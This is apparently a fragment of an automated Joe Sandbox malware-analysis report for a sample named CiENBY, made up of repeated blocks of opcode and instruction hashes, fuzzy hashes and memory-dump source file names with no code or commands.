                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30be8c6ba0dfbf247b6d0ca94c4184b0743391e3d3f856b1fcc0d713fcbded5d
                                                                                • Instruction ID: 5bcdb6861a3c458a4b51df654f25b7cb05bd25912ef81ec02d4113a9c331206e
                                                                                • Opcode Fuzzy Hash: 30be8c6ba0dfbf247b6d0ca94c4184b0743391e3d3f856b1fcc0d713fcbded5d
                                                                                • Instruction Fuzzy Hash: C9A1B178B002859FCB45DF69C854A7EBBF6EF89700B1494AAE516DB3A2CB30DC11CB51
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51b7b576aa7bdfb4e938b169f03713c914226be4b10c25d5cd10cd6251e96592
                                                                                • Instruction ID: 1606f2c42d55ebaac59284c2c24864bdcec5253c0f7e7ee1bddcd20833196362
                                                                                • Opcode Fuzzy Hash: 51b7b576aa7bdfb4e938b169f03713c914226be4b10c25d5cd10cd6251e96592
                                                                                • Instruction Fuzzy Hash: 0C428774B00A158FDB24EF7AC450A6EBBB2FFC5310B114A9CE4039F391DB75A9018B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1726bee24b6b38019c5e7f0d5408ec2c11e6112a590d05a6d7ee75608239f489
                                                                                • Instruction ID: 4ddf14fd6503c9d5968ae17351739d1bcf5b93a012dd28b95bbd7a620f9f9488
                                                                                • Opcode Fuzzy Hash: 1726bee24b6b38019c5e7f0d5408ec2c11e6112a590d05a6d7ee75608239f489
                                                                                • Instruction Fuzzy Hash: C1D1AD38B042449FDB11DF65C955A6E7BB6FF89300F15818AE9028F3A2CBB1DC55CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 00895003cb43713a841ccdf8af865939c524bfd12ae39852226faa78343f1fb6
                                                                                • Instruction ID: 469b4868e3458b272569f148ae5080b8bbc5f9d0b501f2fc23bddbb1c30e380e
                                                                                • Opcode Fuzzy Hash: 00895003cb43713a841ccdf8af865939c524bfd12ae39852226faa78343f1fb6
                                                                                • Instruction Fuzzy Hash: 10C18934B00204DFEB14DFA9C955A6EBBB6FF88301F158199E9129F3A1CBB1D851CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 24e4389c5a394b64b833366d23b1151a7b1c0638d28e0f17c2f533ff956afb2c
                                                                                • Instruction ID: 91de59da66d9f16a6b13468a792e2f64243df33c6e4d571202de5cf041f9a2ba
                                                                                • Opcode Fuzzy Hash: 24e4389c5a394b64b833366d23b1151a7b1c0638d28e0f17c2f533ff956afb2c
                                                                                • Instruction Fuzzy Hash: 1151393AB042059FCB549B7ED84157AB7F5EFC6221B24857EE846CB211EB31C855C7E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc782d96d1de5b83274a7c92c4d5e70c1817ac22317919b4a65bbf74fdb7e103
                                                                                • Instruction ID: cd9f28d58c3908058b0dcefbcd0915f02cc64bc91ed5ec4b7d132c007a826c8c
                                                                                • Opcode Fuzzy Hash: dc782d96d1de5b83274a7c92c4d5e70c1817ac22317919b4a65bbf74fdb7e103
                                                                                • Instruction Fuzzy Hash: 46215A39B001049FCB14CF69D884EA9BBB2EF88714F5180A9F9069F3A2DB31EC01CB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2079739650.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_ced000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d4811c868f4d102e34e1b1fcf55a6a1e0f684f1bc284c55ae1740131d9ef490
                                                                                • Instruction ID: 87659ecc4fb16d6199496de414e7cde92eb5390458d0170197f11da4606e8a75
                                                                                • Opcode Fuzzy Hash: 9d4811c868f4d102e34e1b1fcf55a6a1e0f684f1bc284c55ae1740131d9ef490
                                                                                • Instruction Fuzzy Hash: 2321F872504280DFDF15DF15D9C0B2ABFA5FB88324F24C669E90A0F256C33AD816DBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e202e6621097515eceb2bd540e8235f41d0cb5b0e7c813b2e79c47b42a58b4e7
                                                                                • Instruction ID: 801c6b38e1155fdb736c5aa693f0244500d4a62cbb4fb5a0144719abd19ec27b
                                                                                • Opcode Fuzzy Hash: e202e6621097515eceb2bd540e8235f41d0cb5b0e7c813b2e79c47b42a58b4e7
                                                                                • Instruction Fuzzy Hash: 812135B1505240DFDB00EF14D9D1B2EBFB5FB88324F24C96EE84A4B646C33AD406CAA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27855e79eed78b1386f96fe908b590f349f94e0dfcddd9073b5e6d43e9dcdd6a
                                                                                • Instruction ID: 58a51d36cb1065f6ac0de9a397d668d4e7f2606df42f586e86104e11fd25a534
                                                                                • Opcode Fuzzy Hash: 27855e79eed78b1386f96fe908b590f349f94e0dfcddd9073b5e6d43e9dcdd6a
                                                                                • Instruction Fuzzy Hash: C32137B1504200DFDB04EF14C5D0B2ABFB5FB88718F24C96DE9094B652C37AD806CA66
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2079739650.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_ced000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction ID: d1e9862270e30de7117b5b2c19164f58e33e8f86cc65e38b29645cd3a86b6100
                                                                                • Opcode Fuzzy Hash: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction Fuzzy Hash: 8121AF76504280DFDF16CF10D9C4B1ABF72FB88324F2486A9D9494B256C33AD926DB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction ID: bb53af2daa0bdd8644b53727a4e0562da2f94b89dbd4c77a534135c2d2a1cd70
                                                                                • Opcode Fuzzy Hash: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction Fuzzy Hash: 9A110176505280CFDB12DF10D5D0B1AFF71FB84324F28C6AAD8494BA46C33AD40ACBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                • API String ID: 0-3970889292